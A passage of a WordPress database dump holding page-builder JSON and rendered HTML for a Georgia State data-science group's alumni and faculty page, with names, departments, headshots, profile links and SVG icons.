Science<\\/span><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sathwikchowda\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c168\",\"index\":1,\"id\":\"182-c172\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c173\",\"parentId\":\"182-c142\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c173\",\"index\":0,\"id\":\"182-c174\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Brindal-1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1599,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c173\",\"index\":0,\"id\":\"182-c175\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Brindal Dhol\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c173\",\"index\":2,\"id\":\"182-c176\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/brindaldhol\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c173\",\"index\":1,\"id\":\"182-c177\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c178\",\"parentId\":\"182-c142\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c178\",\"index\":0,\"id\":\"182-c179\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-ruby_parcells-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":853,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c178\",\"index\":0,\"id\":\"182-c180\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Ruby Parcells\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c178\",\"index\":2,\"id\":\"182-c181\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"},\"domuuid\":\"182-c259\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c182\",\"parentId\":\"182-c142\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c182\",\"index\":0,\"id\":\"182-c183\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Reshmanjali-1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1600,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c182\",\"index\":0,\"id\":\"182-c184\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sai Reshmanjali\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c182\",\"index\":2,\"id\":\"182-c185\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/reshmanjali-guntupalli\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c182\",\"index\":1,\"id\":\"182-c186\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c187\",\"parentId\":\"182-c142\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c187\",\"index\":0,\"id\":\"182-c188\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Bronson.png\",\"caption\":{\"text\":\"\"},\"imageId\":817,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c187\",\"index\":0,\"id\":\"182-c189\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Bronson Tharpe\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c187\",\"index\":2,\"id\":\"182-c190\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/bronson-tharpe-9b754a1ba\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c187\",\"index\":1,\"id\":\"182-c191\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"}],\"id\":\"182-c142\",\"parentId\":\"182-c141\",\"partialId\":182,\"styleRef\":911,\"type\":\"content\"}],\"id\":\"182-c141\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Alumni\"},\"id\":\"182-c194\",\"parentId\":\"182-c193\",\"partialId\":182,\"styleRef\":926,\"type\":\"content\"}],\"id\":\"182-c193\",\"parentId\":\"182-c192\",\"partialId\":182,\"styleRef\":925,\"type\":\"content\"}],\"id\":\"182-c192\",\"parentId\":\"182-c141\",\"partialId\":182,\"styleRef\":924,\"type\":\"content\"}]},\"styleRef\":910,\"type\":\"content\"}],\"id\":\"182-c1\",\"partialId\":182,\"styleRef\":407,\"type\":\"content\"}','','','inherit','closed','closed','','562-revision-v1','','','2023-10-12 16:48:27','2023-10-12 20:48:27','',562,'https://gsudice.dataconn.net/?p=1683',0,'revision','',0),(1684,1,'2023-10-12 16:48:27','2023-10-12 20:48:27','<div data-colibri-id=\"182-c1\" class=\"style-407 style-local-182-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c2\" id=\"faculty\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-970 style-local-182-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c58\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-984 style-local-182-c58 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-985-outer style-local-182-c59-outer\">\n            <div data-colibri-id=\"182-c59\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-985 style-local-182-c59 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c60\" class=\"h-global-transition-all h-heading style-986 style-local-182-c60 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-986 style-local-182-c60\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Faculty</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-971 style-local-182-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c4-outer\">\n            <div data-colibri-id=\"182-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c5\" class=\"d-block style-973 style-local-182-c5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-cropped-headshot-1-e1651208089645-1-e1697138345727.jpg\" class=\"wp-image-1646 style-973-image style-local-182-c5-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c5-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c6\" class=\"h-global-transition-all h-heading style-974 style-local-182-c6 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c6\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Chetan Tiwari</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c7\" class=\"h-text h-text-component style-975 style-local-182-c7 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Director</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c8\" class=\"h-text h-text-component style-976 style-local-182-c8 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c9\" class=\"style-977 style-local-182-c9 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/chetan-tiwari/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/chetan-tiwari/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=C5PVPkoAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c10-outer\">\n            <div data-colibri-id=\"182-c10\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c10 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c11\" class=\"d-block style-978 style-local-182-c11 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-Portrait-1-1-e1697138676716.jpeg\" class=\"wp-image-1648 style-978-image style-local-182-c11-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-978-frameImage style-local-182-c11-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c12\" class=\"h-global-transition-all h-heading style-974 style-local-182-c12 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c12\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Armin Mikler</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c13\" class=\"h-text h-text-component style-975 style-local-182-c13 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p> Chair and Professor\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c14\" class=\"h-text h-text-component style-976 style-local-182-c14 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c15\" class=\"style-979 style-local-182-c15 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/armin-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/armin-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=41ckZZsAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 